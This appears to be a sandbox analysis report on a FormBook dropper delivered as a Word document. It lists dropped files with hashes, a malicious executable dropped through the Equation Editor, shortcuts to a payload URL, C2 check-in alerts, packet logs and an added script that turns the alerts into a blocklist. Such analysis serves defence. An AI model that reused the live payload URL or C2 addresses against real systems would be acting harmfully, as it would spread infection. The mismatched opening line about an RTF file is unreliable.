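Entropy alone says little for RTF: the report's value of 3.71 for a 574 KB file reflects the long decoy paragraph and repeated filler rather than packed code, so the object control words and the decoded `\objdata` content are the signals to act on.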
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                              Category:dropped
                                                                              Size (bytes):5632
                                                                              Entropy (8bit):3.947043578001658
                                                                              Encrypted:false
                                                                              SSDEEP:48:rfUbMMPoyChj56ttFmSlbkCBBFO0UtzGrFjHxZJCZyc8:zUYMPoyCt8ttFVlLBLKtzGrFjHRCZD
                                                                              MD5:436555078F71AA2CED9AA747DB10FD7F
                                                                              SHA1:C3846E92257B60FC981BF42F25451F0CD590D057
                                                                              SHA-256:037F3906037465FDD21DF26763321A703A00B3E85572309BAD49B50104EC3DDD
                                                                              SHA-512:5251795801FDB128BD4ADB98C02917571D71DF7F606B5ECB9FD4B96EB7BCBC3B05006A7C5EC1D084F79A6800F29C4BD5A5D16B2F9ABB4DC6CCE249C971CDC8CA
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              Reputation:low
                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1536
                                                                              Entropy (8bit):1.354223167367391
                                                                              Encrypted:false
                                                                              SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbJ:IiiiiiiiiifdLloZQc8++lsJe1Mze
                                                                              MD5:07D3B2764936F1DFD502CAA1FE793BBA
                                                                              SHA1:771A0BF7AD570C260864424CE77EA404151F9252
                                                                              SHA-256:2EFDE96D97C571F94ABE64BB029652C603A6B2B2A36F8BA0831DBA177A9D6301
                                                                              SHA-512:CB58E4340C8D200F5DDB3DD969EF6E101E042596D6103ECFC959ED72A0E8696344654D4CC4DBA2A47391B978E897F7DDE51B4DFF401C5F35C2919D6A32588624
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1024
                                                                              Entropy (8bit):0.05390218305374581
                                                                              Encrypted:false
                                                                              SSDEEP:3:ol3lYdn:4Wn
                                                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):46874
                                                                              Entropy (8bit):3.551464186925344
                                                                              Encrypted:false
                                                                              SSDEEP:768:uaWvW5Kq2g0Zos0SCWiMuz1rqAyLt+eqViz9yCFcEhZVsft:FgemiDvwxKrK2ft
                                                                              MD5:AC7C710B6CA9D66ED9923D65C708B21B
                                                                              SHA1:756E2D7C42EF9BF05DA7EA871B077BB6DAFCD8E7
                                                                              SHA-256:C1BEA8318A21530E776F4E3336A3F5E8AFE04F52FBB44F254304A9F36C570B68
                                                                              SHA-512:B366139A262F47A8C38FC1B5E649F9529E5E89471FF34B543A484737F84C6AF7185AB363946BFBD17DB9BA6642D0CE5520BEA236693CA27E3AF123816809F65C
                                                                              Malicious:false
                                                                              Preview:..d.M.B.C.....B.E.S.O.N.D.E.R.H.E.D.E. .B.E.S.O.N.D.E.R.H.E.D.E. .V.I.R. .H.I.E.R.D.I.E. .M.A.A.N.D.....D.R.A.E.N.D.E. .N.R... .H.O.E.V.....3.0.2.0.8. .N.B.C. .D.R.A.A.G. .3.0. .S.T.K.....3.0.3.0.8. .N.B.C. .D.R.A.A.G. .6. .S.T.K.....3.2.0.0.7.X. .N.B.C. .D.R.A.A.G. .7.4. .S.T.K.....3.3.0.0.5. .N.B.C. .w.a.t. .5. .s.t.e.l.l.e. .d.r.a.....5.2.7.9.9. ./. .8.0.0.U. .(.2.5.8.7.7./.2.1.). .N.B.C. .w.a.t. .3.0. .P.C.S. .d.r.a.....6.0.0.1. .N.B.C. .w.a.t. .1.0.0. .s.t.u.k.s. .d.r.a.....6.0.0.4. .N.B.C. .w.a.t. ...................f...h...................................R...T..................................................................................................................................................................................................................................................................................................<...$..$.If........!v..h.#v..9.:V....l...,..t.......9..6.,.....5.....9.9...../.............B.....a..].p............yt%~D.....d........gd%
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):355840
                                                                              Entropy (8bit):3.4571116056737323
                                                                              Encrypted:false
                                                                              SSDEEP:6144:FyemryemryemryemryemryemryemryemryemryemryemryemryemryemryemryeQ:u+
                                                                              MD5:975E52C60B72CB852647E2DFB421C3DA
                                                                              SHA1:875F1299875367094D21043B9A1E8EB6A68D5619
                                                                              SHA-256:66315F9508E443539082CCAAC2F668A210AD3553C15B471A55279FC233CD2F7D
                                                                              SHA-512:922BD7D85889E132E3970FE01691AE4FDEA33D2125CA3AAA0B4BA26605A368007F9E243A79FF952336EB917D28D4BB73536347D782DEC23C794FF3C668FD78E3
                                                                              Malicious:false
                                                                              Preview:9.6.4.5.1.9.6.9.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):131072
                                                                              Entropy (8bit):0.025641774504967164
                                                                              Encrypted:false
                                                                              SSDEEP:6:I3DPcJmFXSHvxggLRbJmtYg/thzgNhis7/RXv//4tfnRujlw//+GtluJ/eRuj:I3DPYf/6Y2UJvYg3J/
                                                                              MD5:03FB2889E16E52A751FD331D0BA1FC97
                                                                              SHA1:CBAEBD6367813873583BB2D15CBC3DE46E0157FF
                                                                              SHA-256:AEDF380BA37490F2682BBF8720EE79AEA6C5AB36C72034C648AB7512DDCBE85D
                                                                              SHA-512:88169652782FEFD57BF0AF8D4A1A5EDC25FA8970BF811CBA1DDA554A1C9A8F884D0F737BABBB13931AD8CC1EE04D0CCB4989A7A9C07074B938F3ECCA9A3DB4D3
                                                                              Malicious:false
                                                                              Preview:......M.eFy...z.ft...cJ........S,...X.F...Fa.q................................E.M..).Q..................H....E........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):131072
                                                                              Entropy (8bit):0.025577510879182384
                                                                              Encrypted:false
                                                                              SSDEEP:6:I3DPccVvxggLROoe5lltg4nlZ/RXv//4tfnRujlw//+GtluJ/eRuj:I3DPV78l24nlHvYg3J/
                                                                              MD5:F31E5CE13D286F4BB79241DB02CD4185
                                                                              SHA1:8C293C49FA4227E50D3F3024A1EA716D7FB170EC
                                                                              SHA-256:A2B89700BF677B66A17BB9B74E8A2DB9953CC2E6B2B67842AA546E93807B9ACD
                                                                              SHA-512:454D21551E50A2D5CAF6233E99688DC61A7132D5E67A80D6B450D1375F582F444210F8D21CCD60F9F1596E34736F4CFEF998214052348C997BC814AFC5795057
                                                                              Malicious:false
                                                                              Preview:......M.eFy...zEYN.f..C.Q&.u...S,...X.F...Fa.q.................................L.Y..N..........V.@h..I.K....p......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:11 2023, mtime=Fri Aug 11 15:42:11 2023, atime=Tue Jun 25 12:13:38 2024, length=16426, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):1059
                                                                              Entropy (8bit):4.5002695685410785
                                                                              Encrypted:false
                                                                              SSDEEP:12:8Cj5/MjgXg/XAlCPCHaXVBYmgB/qPX+WnCKOX1QH1juicvbFSJQHPDtZ3YilMME7:8g5/S/XTFKmg4XlBNeRHPDv3qsk7N
                                                                              MD5:7E4D8FFD5DF6D22D9324E8C45BCB2F29
                                                                              SHA1:5864B6A843E2BD439B54614C2B04BFE6273F7F8F
                                                                              SHA-256:813136F4D97570469036DFB0695ACF077E9C821E272FAE90B107B65713639384
                                                                              SHA-512:D323FB2E9719A1BB16522FEDFEA9AEC64E62B1F835261AF921152D622548DCFA1E015017475F8B830284213D49A09EC0A6B046F63CA098C253F9E88B20DC1009
                                                                              Malicious:false
                                                                              Preview:L..................F.... .......r.......r...0.(~....*@...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X.i..user.8......QK.X.X.i*...&=....U...............A.l.b.u.s.....z.1......WG...Desktop.d......QK.X.WG.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2.*@...X.i .ORDER-~1.DOC..\.......WF..WF.*.........................O.r.d.e.r.-.1.3.5.1.1.2.5.X...d.o.c.x...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\284992\Users.user\Desktop\Order-1351125X.docx.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.r.d.e.r.-.1.3.5.1.1.2.5.X...d.o.c.x...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......284992..........D_....3N.
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:Generic INItialization configuration [folders]
                                                                              Category:dropped
                                                                              Size (bytes):115
                                                                              Entropy (8bit):4.841477143075871
                                                                              Encrypted:false
                                                                              SSDEEP:3:M14JJ9UWQNm7Sm4lEJIKT+S9UWQNm7Sv:MCJJ2s76gIKKS2s7c
                                                                              MD5:1758CDD4DFB722B1F24F9F5F0C68449E
                                                                              SHA1:827DC6E8EC23C07A65C0940CE4666DBA37247627
                                                                              SHA-256:539B49530CEED8F6E52EDC258E936B7B5F4AC60DC2684751470BF290B073E663
                                                                              SHA-512:D9348BC9909B1A6FD372D7ADBBD2491BC83646626F9F2698006B86E1F3AE8F3132BA81834EF5D4B3CF5DCB82A85E4BDC4C969FB02BB41C766B65296A57A9C097
                                                                              Malicious:false
                                                                              Preview:[doc]..nelb.doc.url=0..Order-1351125X.docx.LNK=0..[folders]..universalmovies.top.url=0..Order-1351125X.docx.LNK=0..
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<https://universalmovies.top/nelb.doc>), ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):62
                                                                              Entropy (8bit):4.63926425497832
                                                                              Encrypted:false
                                                                              SSDEEP:3:HRAbABGQYm2ftREJIKT+RAJVUn:HRYFVm4DgIKKmJW
                                                                              MD5:4DC4B71E6895435832003136CCD9FF27
                                                                              SHA1:4174009CB974E21157DB7A8382520382E5424266
                                                                              SHA-256:B0DFF51FCE90AD4F8E95D289F3A92B876F19912BC9E29E0F79E8B2536351DA10
                                                                              SHA-512:CBB2274140DFB16844F86A7BB266AE7FF3EB5B075BBAEC287F5F0A8935DE5A40BB7B17A307595E693BE3D5C8CACBDD65D64D151FCC8E60175575BF6A41ED7620
                                                                              Malicious:true
                                                                              Preview:[InternetShortcut]..URL=https://universalmovies.top/nelb.doc..
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<https://universalmovies.top/>), ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):54
                                                                              Entropy (8bit):4.543296354659384
                                                                              Encrypted:false
                                                                              SSDEEP:3:HRAbABGQYm2ftREJIKT+yv:HRYFVm4DgIKKyv
                                                                              MD5:3C956186B2FF37FBFA333BDF67DDB8BD
                                                                              SHA1:728D4652328FCEE86DD0DDE155AAA55368CE02DA
                                                                              SHA-256:7B8479B5BE126F67DBD13A73A9210F43E60155F0AD59296F8E7870F69989214B
                                                                              SHA-512:386117368A28FEB1D83B8121057D59BE20D129AC9D2583EF3F22C1D56455CA186EA95333B4A3B0727A7E35855D8C75DD8FFE779B891213DFE55BEEAAFF65A800
                                                                              Malicious:true
                                                                              Preview:[InternetShortcut]..URL=https://universalmovies.top/..
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):162
                                                                              Entropy (8bit):2.4797606462020307
                                                                              Encrypted:false
                                                                              SSDEEP:3:vrJlaCkWtVyYyBS0JilXMWvk1c6nlln:vdsCkWtIJiRk3l
                                                                              MD5:C4615A023DC40AFFAEAE6CF07410BB43
                                                                              SHA1:AAE1D68C4082CABF6AEA71C7981F32928CE01843
                                                                              SHA-256:103F860A912CF17B87A169B2768635758E8A0B82EB986A0C42FEA974F91BCB1E
                                                                              SHA-512:CD6975EAE1DA934094AC2516D095D50F2EE311CF549C8AEA2F3D65074B0DFC2908F72703B46A4C012358817289C76B15AC0E39EE359BCF39A45A8C912DCB2AAD
                                                                              Malicious:false
                                                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2
                                                                              Entropy (8bit):1.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:Qn:Qn
                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                              Malicious:false
                                                                              Preview:..
                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):628736
                                                                              Entropy (8bit):7.397696471881069
                                                                              Encrypted:false
                                                                              SSDEEP:12288:LajzneBoLmk8bLq4xKNhZAb2drAJuU6ljqdLGtierEWhuV:2jznfL/qLxK7ZAbWAJJ6lGdLGtierEJV
                                                                              MD5:607868824F841FF4B6E24E997228D10D
                                                                              SHA1:76A91EE65551D7BABF8799BBECD9E78C44F47787
                                                                              SHA-256:7392B6A710583060D7F5BD8A3A7573FA0F278A543F961057FEC04445D017DE3B
                                                                              SHA-512:99F856165BCDFEAF6EF3E9F34C9D88CB30E3467F238EEF4489ADE96024D57D50DD002DA63E77DFEB82458B084A1535A7392AC159711337B8694E75822033EBC8
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 37%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...S.................0.................. ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......4...4...........................................................&.(......*".......*".(.....*Vs....(....t.........*...}.....(......~5...tL...(....&.(.....*..*.(.........*".s....&*.r...p.4...(?...(%...o@...oA....#..5....(B....0...*....}3....(........{3....X.....}2...*z.(........}6.....}7.....}8...*F.~9...(P....c...*6.~9....(Q...*F.~:...(P....c...*6.~:....(Q...*F.~;...(P....c...*6.~;....(Q...*F.~<...(P........*J.~<.........(R...*F.~=...(P....c...*6.~=....(Q...*F.~>...(P.
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):162
                                                                              Entropy (8bit):2.4797606462020307
                                                                              Encrypted:false
                                                                              SSDEEP:3:vrJlaCkWtVyYyBS0JilXMWvk1c6nlln:vdsCkWtIJiRk3l
                                                                              MD5:C4615A023DC40AFFAEAE6CF07410BB43
                                                                              SHA1:AAE1D68C4082CABF6AEA71C7981F32928CE01843
                                                                              SHA-256:103F860A912CF17B87A169B2768635758E8A0B82EB986A0C42FEA974F91BCB1E
                                                                              SHA-512:CD6975EAE1DA934094AC2516D095D50F2EE311CF549C8AEA2F3D65074B0DFC2908F72703B46A4C012358817289C76B15AC0E39EE359BCF39A45A8C912DCB2AAD
                                                                              Malicious:false
                                                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                              File type:Microsoft Word 2007+
                                                                              Entropy (8bit):7.925222813665451
                                                                              TrID:
                                                                              • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                                                                              • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                                                                              • ZIP compressed archive (8000/1) 9.41%
                                                                              File name:Order-1351125X.docx.doc
                                                                              File size:16'426 bytes
                                                                              MD5:e86424648b277754b74e507d51878e71
                                                                              SHA1:e86498df0eb2a8514e0d55f9a33148779bf5b66d
                                                                              SHA256:3f9c2a2bac5e829fd61db15ffda44387442cd91f7d84bb3d8e28b19c9ac098b0
                                                                              SHA512:59c3c950a0f450b895b091fdf7f9664ed75124be0b7c699631b0a753bef062304151e1e58b3dfcc2032e819f339336c996482a6de94eee3e6327d24e8c51f84c
                                                                              SSDEEP:384:0yXRxAxW4s8PL8wi4OEwH8TIbE91r2fR8JYbvimVmPFM:0cRM/5P3DOqnYJ6qvfVmPG
                                                                              TLSH:0D729E6DD48411BEC34784B891122851F3ECD9FFF3A69D3AA2D0B65C88B9ACEC70165C
                                                                              File Content Preview:PK.........E.X...7U... .......[Content_Types].xmlUT.....zf..zf..zf...n.0.E...............e.T.....U..<...;!.U.%U.M.d..sgby0ZW.[BB.|!.yOd.u0....>y....Iy.\.P.........M..X...s.x/%.9T....s...R..i&...j......:x.O].=.p...Z8.....I........U....Z...........r..s....B
                                                                              Icon Hash:2764a3aaaeb7bdbf
                                                                              Document Type:OpenXML
                                                                              Number of OLE Files:1
                                                                              Has Summary Info:
                                                                              Application Name:
                                                                              Encrypted Document:False
                                                                              Contains Word Document Stream:True
                                                                              Contains Workbook/Book Stream:False
                                                                              Contains PowerPoint Document Stream:False
                                                                              Contains Visio Document Stream:False
                                                                              Contains ObjectPool Stream:False
                                                                              Flash Objects Count:0
                                                                              Contains VBA Macros:False
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
06/25/24-15:16:55.778410 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49180 | 80 | 192.168.2.22 | 23.33.130.190
06/25/24-15:17:56.714740 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49183 | 80 | 192.168.2.22 | 192.243.61.227
06/25/24-15:18:15.693590 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49184 | 80 | 192.168.2.22 | 23.227.38.74
06/25/24-15:14:54.227212 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49177 | 80 | 192.168.2.22 | 15.197.148.33
06/25/24-15:15:34.385117 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49178 | 80 | 192.168.2.22 | 167.172.228.26
06/25/24-15:17:35.364789 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49182 | 80 | 192.168.2.22 | 156.241.141.214
06/25/24-15:14:32.532373 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49176 | 80 | 192.168.2.22 | 104.21.89.47
06/25/24-15:15:55.182689 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49179 | 80 | 192.168.2.22 | 15.197.148.33
06/25/24-15:17:16.459709 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49181 | 80 | 192.168.2.22 | 5.149.161.103
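All nine alerts fire on the same ET signature (SID 2031412) from the same sandbox client, but against eight different servers in roughly twenty-second steps; that fan-out is the FormBook behaviour of walking its configured domain list, most of which are decoys, so no single destination should be read as "the" C2. The script below is an added example, not part of the Joe Sandbox report: it parses alert rows laid out in the column order used above (the row text is embedded as constructed input, copied from this table), builds a per-destination summary with first/last seen and hit count, and computes the inter-check-in cadence an analyst would compare against other FormBook runs. The parsing assumes pipe-separated columns; adapt `parse_alerts` if your export uses tabs or CSV.

```python
"""Turn FormBook check-in alerts from a sandbox run into per-C2 indicators."""
from collections import defaultdict
from datetime import datetime

# Constructed input: the alert rows from the report, pipe-separated in the
# column order Timestamp | Protocol | SID | Message | Src Port | Dst Port | Src IP | Dst IP.
ALERT_ROWS = """\
06/25/24-15:16:55.778410 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49180 | 80 | 192.168.2.22 | 23.33.130.190
06/25/24-15:17:56.714740 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49183 | 80 | 192.168.2.22 | 192.243.61.227
06/25/24-15:18:15.693590 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49184 | 80 | 192.168.2.22 | 23.227.38.74
06/25/24-15:14:54.227212 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49177 | 80 | 192.168.2.22 | 15.197.148.33
06/25/24-15:15:34.385117 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49178 | 80 | 192.168.2.22 | 167.172.228.26
06/25/24-15:17:35.364789 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49182 | 80 | 192.168.2.22 | 156.241.141.214
06/25/24-15:14:32.532373 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49176 | 80 | 192.168.2.22 | 104.21.89.47
06/25/24-15:15:55.182689 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49179 | 80 | 192.168.2.22 | 15.197.148.33
06/25/24-15:17:16.459709 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49181 | 80 | 192.168.2.22 | 5.149.161.103
"""

FORMBOOK_CHECKIN_SID = 2031412


def parse_alerts(text):
    """Parse pipe-separated alert rows into dicts, sorted by timestamp.
    Rows that do not have exactly eight columns are skipped, not guessed at."""
    alerts = []
    for line in text.splitlines():
        parts = [p.strip() for p in line.split("|")]
        if len(parts) != 8:
            continue
        ts, proto, sid, msg, sport, dport, sip, dip = parts
        alerts.append({
            "ts": datetime.strptime(ts, "%m/%d/%y-%H:%M:%S.%f"),
            "proto": proto, "sid": int(sid), "msg": msg,
            "sport": int(sport), "dport": int(dport), "src": sip, "dst": dip,
        })
    return sorted(alerts, key=lambda a: a["ts"])


def summarize_c2(alerts, sid=FORMBOOK_CHECKIN_SID):
    """One record per (dst IP, dst port, proto) with hit count and first/last seen,
    ordered by first contact."""
    seen = defaultdict(list)
    for a in alerts:
        if a["sid"] == sid:
            seen[(a["dst"], a["dport"], a["proto"])].append(a["ts"])
    summary = [
        {"dst": dst, "dport": dport, "proto": proto, "hits": len(times),
         "first_seen": min(times), "last_seen": max(times)}
        for (dst, dport, proto), times in seen.items()
    ]
    return sorted(summary, key=lambda s: s["first_seen"])


def checkin_intervals(alerts, sid=FORMBOOK_CHECKIN_SID):
    """Seconds between consecutive check-ins regardless of destination: the
    beacon cadence, which survives even when every domain in the list changes."""
    stamps = [a["ts"] for a in alerts if a["sid"] == sid]
    return [round((later - earlier).total_seconds(), 1)
            for earlier, later in zip(stamps, stamps[1:])]


def blocklist(summary):
    """Sorted 'ip:port' strings suitable for a firewall or proxy deny list."""
    return sorted(f"{s['dst']}:{s['dport']}" for s in summary)


if __name__ == "__main__":
    parsed = parse_alerts(ALERT_ROWS)
    for rec in summarize_c2(parsed):
        print(f"{rec['dst']:>16}:{rec['dport']}  hits={rec['hits']}  "
              f"first={rec['first_seen'].time()}  last={rec['last_seen'].time()}")
    print("intervals (s):", checkin_intervals(parsed))
```

The blocklist is the short-lived part of the output; the cadence and the "one client, many servers on port 80 via plain GET" shape are what a detection engineer should carry into hunting queries, since the next campaign will ship a different domain list.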
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 25, 2024 15:13:41.838670015 CEST | 49166 | 443 | 192.168.2.22 | 172.67.162.95
Jun 25, 2024 15:13:41.838712931 CEST | 443 | 49166 | 172.67.162.95 | 192.168.2.22
Jun 25, 2024 15:13:41.838788033 CEST | 49166 | 443 | 192.168.2.22 | 172.67.162.95
Jun 25, 2024 15:13:41.844547987 CEST | 49166 | 443 | 192.168.2.22 | 172.67.162.95
Jun 25, 2024 15:13:41.844563007 CEST | 443 | 49166 | 172.67.162.95 | 192.168.2.22
Jun 25, 2024 15:13:42.318475962 CEST | 443 | 49166 | 172.67.162.95 | 192.168.2.22
Jun 25, 2024 15:13:42.318639994 CEST | 49166 | 443 | 192.168.2.22 | 172.67.162.95
Jun 25, 2024 15:13:42.323928118 CEST | 49166 | 443 | 192.168.2.22 | 172.67.162.95
Jun 25, 2024 15:13:42.323954105 CEST | 443 | 49166 | 172.67.162.95 | 192.168.2.22
Jun 25, 2024 15:13:42.324407101 CEST | 443 | 49166 | 172.67.162.95 | 192.168.2.22
Jun 25, 2024 15:13:42.324501038 CEST | 49166 | 443 | 192.168.2.22 | 172.67.162.95
Jun 25, 2024 15:13:42.425597906 CEST | 49166 | 443 | 192.168.2.22 | 172.67.162.95
Jun 25, 2024 15:13:42.468509912 CEST | 443 | 49166 | 172.67.162.95 | 192.168.2.22
Jun 25, 2024 15:13:42.767155886 CEST | 443 | 49166 | 172.67.162.95 | 192.168.2.22
Jun 25, 2024 15:13:42.767261028 CEST | 443 | 49166 | 172.67.162.95 | 192.168.2.22
Jun 25, 2024 15:13:42.767287970 CEST | 49166 | 443 | 192.168.2.22 | 172.67.162.95
Jun 25, 2024 15:13:42.767318010 CEST | 49166 | 443 | 192.168.2.22 | 172.67.162.95
Jun 25, 2024 15:13:42.773134947 CEST | 49166 | 443 | 192.168.2.22 | 172.67.162.95
Jun 25, 2024 15:13:42.773134947 CEST | 49166 | 443 | 192.168.2.22 | 172.67.162.95
Jun 25, 2024 15:13:42.773180962 CEST | 443 | 49166 | 172.67.162.95 | 192.168.2.22
Jun 25, 2024 15:13:42.773247957 CEST | 49166 | 443 | 192.168.2.22 | 172.67.162.95
Jun 25, 2024 15:13:45.790220976 CEST | 49167 | 443 | 192.168.2.22 | 172.67.162.95
Jun 25, 2024 15:13:45.790258884 CEST | 443 | 49167 | 172.67.162.95 | 192.168.2.22
Jun 25, 2024 15:13:45.790338993 CEST | 49167 | 443 | 192.168.2.22 | 172.67.162.95
